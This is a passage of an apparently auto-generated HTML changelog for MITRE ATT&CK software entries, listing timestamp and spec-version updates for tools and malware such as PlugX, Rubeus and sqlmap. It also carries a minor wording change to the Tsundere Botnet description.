23:22:17.808000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.734000+00:00</td></tr></tbody></table></details><hr><h4>[S0039] Net</h4><p><b>Current version</b>: 2.8</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:16:53.721000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S0359] Nltest</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 13:17:52.139000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S9014] PHASEJAM</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 02:56:02.086000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr></tbody></table></details><hr><h4>[S9028] PHPsert</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 23:57:49.687000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr></tbody></table></details><hr><h4>[S1228] PUBLOAD</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-08 13:51:05.286000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S0097] Ping</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:17:47.775000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S0013] PlugX</h4><p><b>Current version</b>: 3.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-11-20 22:48:45.121000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.734000+00:00</td></tr></tbody></table></details><hr><h4>[S0029] PsExec</h4><p><b>Current version</b>: 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-09-25 20:31:21.768000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.741000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0262] QuasarRAT</h4><p><b>Current version</b>: 2.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 19:56:22.409000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.741000+00:00</td></tr></tbody></table></details><hr><h4>[S9026] ROAMINGHOUSE</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 20:58:39.745000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S1040] Rclone</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 13:39:30.460000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S0125] Remsec</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-06-06 14:56:00.296000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.735000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S1071] Rubeus</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-19 16:35:49.683000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.741000+00:00</td></tr></tbody></table></details><hr><h4>[S9037] RustyWater</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 02:45:33.450000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S9030] SameCoin</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 00:47:27.191000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S1178] ShrinkLocker</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-26 20:55:58.133000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S1239] TONESHELL</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-08 13:49:07.222000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S0263] TYPEFRAME</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-04-10 22:26:03.638000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.735000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0057] Tasklist</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:20:48.948000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S0183] Tor</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 21:19:41.095000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.741000+00:00</td></tr></tbody></table></details><hr><h4>[S9034] Tsundere Botnet</h4><p><b>Current version</b>: 1.0</p>
+    <table class="diff" id="difflib_chg_to2__top"
+           cellspacing="0" cellpadding="0" rules="groups" >
+        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
+        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
+        <thead><tr><th class="diff_next"><br /></th><th colspan="2" class="diff_header">Old Description</th><th class="diff_next"><br /></th><th colspan="2" class="diff_header">New Description</th></tr></thead>
+        <tbody>
+            <tr><td class="diff_next" id="difflib_chg_to2__0"><a href="#difflib_chg_to2__top">t</a></td><td class="diff_header" id="from2_1">1</td><td nowrap="nowrap">[Tsundere&nbsp;Botnet](https://attack.mitre.org/software/S9034)&nbsp;i</td><td class="diff_next"><a href="#difflib_chg_to2__top">t</a></td><td class="diff_header" id="to2_1">1</td><td nowrap="nowrap">[Tsundere&nbsp;Botnet](https://attack.mitre.org/software/S9034)&nbsp;i</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">s&nbsp;a&nbsp;botnet&nbsp;first&nbsp;reported&nbsp;in&nbsp;mid-2025&nbsp;that&nbsp;is&nbsp;delivered&nbsp;via&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">s&nbsp;a&nbsp;botnet&nbsp;first&nbsp;reported&nbsp;in&nbsp;mid-2025&nbsp;that&nbsp;is&nbsp;delivered&nbsp;via&nbsp;</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">MSI&nbsp;installer&nbsp;or&nbsp;PowerShell&nbsp;script.&nbsp;It&nbsp;leverages&nbsp;Node.js&nbsp;and</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">MSI&nbsp;installer&nbsp;or<span class="diff_add">&nbsp;a</span>&nbsp;PowerShell&nbsp;script.&nbsp;It&nbsp;leverages&nbsp;Node.js&nbsp;a</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;JavaScript&nbsp;for&nbsp;payload&nbsp;delivery&nbsp;and&nbsp;execution,&nbsp;and&nbsp;uses&nbsp;sma</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">nd&nbsp;JavaScript&nbsp;for&nbsp;payload&nbsp;delivery&nbsp;and&nbsp;execution,&nbsp;and&nbsp;uses&nbsp;s</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">rt&nbsp;contracts&nbsp;on&nbsp;the&nbsp;blockchain&nbsp;to&nbsp;host&nbsp;command&nbsp;and&nbsp;control&nbsp;(</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">mart&nbsp;contracts&nbsp;on&nbsp;the&nbsp;blockchain&nbsp;to&nbsp;host&nbsp;command&nbsp;and&nbsp;control</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">C2)&nbsp;addresses.&nbsp;[Tsundere&nbsp;Botnet](https://attack.mitre.org/so</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;(C2)&nbsp;addresses.&nbsp;[Tsundere&nbsp;Botnet](https://attack.mitre.org/</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ftware/S9034)&nbsp;is&nbsp;attributed&nbsp;to&nbsp;a&nbsp;likely&nbsp;Russian-speaking&nbsp;thr</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">software/S9034)&nbsp;is&nbsp;attributed&nbsp;to&nbsp;a&nbsp;likely&nbsp;Russian-speaking&nbsp;t</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">eat&nbsp;actor.&nbsp;&nbsp;A&nbsp;variant&nbsp;named&nbsp;DinDoor&nbsp;has&nbsp;been&nbsp;linked&nbsp;to&nbsp;[Mudd</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">hreat&nbsp;actor.&nbsp;&nbsp;A&nbsp;variant&nbsp;named&nbsp;DinDoor&nbsp;has&nbsp;been&nbsp;linked&nbsp;to&nbsp;[Mu</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">yWater](https://attack.mitre.org/groups/G0069)&nbsp;operations&nbsp;an</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ddyWater](https://attack.mitre.org/groups/G0069)&nbsp;operations&nbsp;</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">d&nbsp;uses&nbsp;the&nbsp;Deno&nbsp;runtime&nbsp;for&nbsp;execution&nbsp;rather&nbsp;than&nbsp;Node.js.<span class="diff_sub">&nbsp;</span>(</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">and&nbsp;uses&nbsp;the&nbsp;Deno&nbsp;runtime&nbsp;for&nbsp;execution&nbsp;rather&nbsp;than&nbsp;Node.js.</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">Citation:&nbsp;Checkpoint_MOISCyberCrime_Mar2026)(Citation:&nbsp;SOCRa</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">(Citation:&nbsp;Checkpoint_MOISCyberCrime_Mar2026)(Citation:&nbsp;SOCR</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">dar_MuddyWaterDindoor_Mar2026)(Citation:&nbsp;CAL_MuddyWater_Mar2</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">adar_MuddyWaterDindoor_Mar2026)(Citation:&nbsp;CAL_MuddyWater_Mar</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">026)(Citation:&nbsp;SecureListUbiedo_Tsundere_Nov2025)&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">2026)(Citation:&nbsp;SecureListUbiedo_Tsundere_Nov2025)&nbsp;</td></tr>
+        </tbody>
+    </table><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 02:54:33.159000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>description</td><td style='border: 1px solid black;border-collapse: collapse;'>[Tsundere Botnet](https://attack.mitre.org/software/S9034) is a botnet first reported in mid-2025 that is delivered via MSI installer or PowerShell script. It leverages Node.js and JavaScript for payload delivery and execution, and uses smart contracts on the blockchain to host command and control (C2) addresses. [Tsundere Botnet](https://attack.mitre.org/software/S9034) is attributed to a likely Russian-speaking threat actor.
+
+A variant named DinDoor has been linked to [MuddyWater](https://attack.mitre.org/groups/G0069) operations and uses the Deno runtime for execution rather than Node.js. (Citation: Checkpoint_MOISCyberCrime_Mar2026)(Citation: SOCRadar_MuddyWaterDindoor_Mar2026)(Citation: CAL_MuddyWater_Mar2026)(Citation: SecureListUbiedo_Tsundere_Nov2025) </td><td style='border: 1px solid black;border-collapse: collapse;'>[Tsundere Botnet](https://attack.mitre.org/software/S9034) is a botnet first reported in mid-2025 that is delivered via MSI installer or a PowerShell script. It leverages Node.js and JavaScript for payload delivery and execution, and uses smart contracts on the blockchain to host command and control (C2) addresses. [Tsundere Botnet](https://attack.mitre.org/software/S9034) is attributed to a likely Russian-speaking threat actor.
+
+A variant named DinDoor has been linked to [MuddyWater](https://attack.mitre.org/groups/G0069) operations and uses the Deno runtime for execution rather than Node.js.(Citation: Checkpoint_MOISCyberCrime_Mar2026)(Citation: SOCRadar_MuddyWaterDindoor_Mar2026)(Citation: CAL_MuddyWater_Mar2026)(Citation: SecureListUbiedo_Tsundere_Nov2025) </td></tr></tbody></table></details><hr><h4>[S0275] UPPERCUT</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 21:04:29.621000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S0645] Wevtutil</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:19:59.238000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.741000+00:00</td></tr></tbody></table></details><hr><h4>[S0160] certutil</h4><p><b>Current version</b>: 1.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 21:03:22.466000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S0032] gh0st RAT</h4><p><b>Current version</b>: 3.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-05-07 19:07:45.403000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.737000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0100] ipconfig</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:12:13.437000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S0102] nbtstat</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-25 14:45:26.343000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0104] netstat</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-11-27 21:54:49.561000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0385] njRAT</h4><p><b>Current version</b>: 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 15:13:03.813000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr></tbody></table></details><hr><h4>[S0225] sqlmap</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-19 18:21:12.122000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details></details><h3>mobile-attack</h3><details><summary>Patches</summary><hr><h4>[S9030] SameCoin</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 00:47:27.191000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S9006] VajraSpy</h4><p><b>Current version</b>: 1.0</p>
+    <table class="diff" id="difflib_chg_to4__top"
+           cellspacing="0" cellpadding="0" rules="groups" >
+        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
+        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
+        <thead><tr><th class="diff_next"><br /></th><th colspan="2" class="diff_header">Old Description</th><th class="diff_next"><br /></th><th colspan="2" class="diff_header">New Description</th></tr></thead>
+        <tbody>
